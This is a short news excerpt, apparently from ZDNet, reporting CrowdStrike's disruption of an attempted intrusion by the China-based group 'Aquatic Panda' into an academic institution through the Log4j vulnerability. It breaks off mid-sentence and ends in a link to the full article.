APT group seen attacking academic institution through Log4J vulnerability: Crowdstrike

Cybersecurity company CrowdStrike has discovered an attempt by a China-based group to infiltrate an academic institution through the Log4j vulnerability

more Log4j

CrowdStrike called the group “Aquatic Panda” and said it is an “intrusion adversary with a dual mission of intelligence collection and industrial espionage” that has operated since at least May 2020. 

The group’s exact intent is unknown because the attack was disrupted. CrowdStrike told ZDNet, however, that Aquatic Panda is known to maintain persistence in environments to gain access to intellectual property and other industrial trade secrets.

“Aquatic Panda operations have primarily focused on entities in the telecommunications, technology, and government sectors,” CrowdStrike explained in a report.

According to CrowdStrike, their system uncovered “suspicious activity stemming from a Tomcat process running under a vulnerable VMWare Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion.”

After watching the group operate and examining the telemetry available, CrowdStrike said it believes that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations.

The team at CrowdStrike discovered that Aquatic Panda used a public GitHub project from Dec.13, 2021 in order to gain access to the vulnerable instance of

Read More: https://www.zdnet.com/article/apt-group-seen-attacking-academic-institution-through-log4j-vulnerability-crowdstrike/#ftag=RSSbaffb68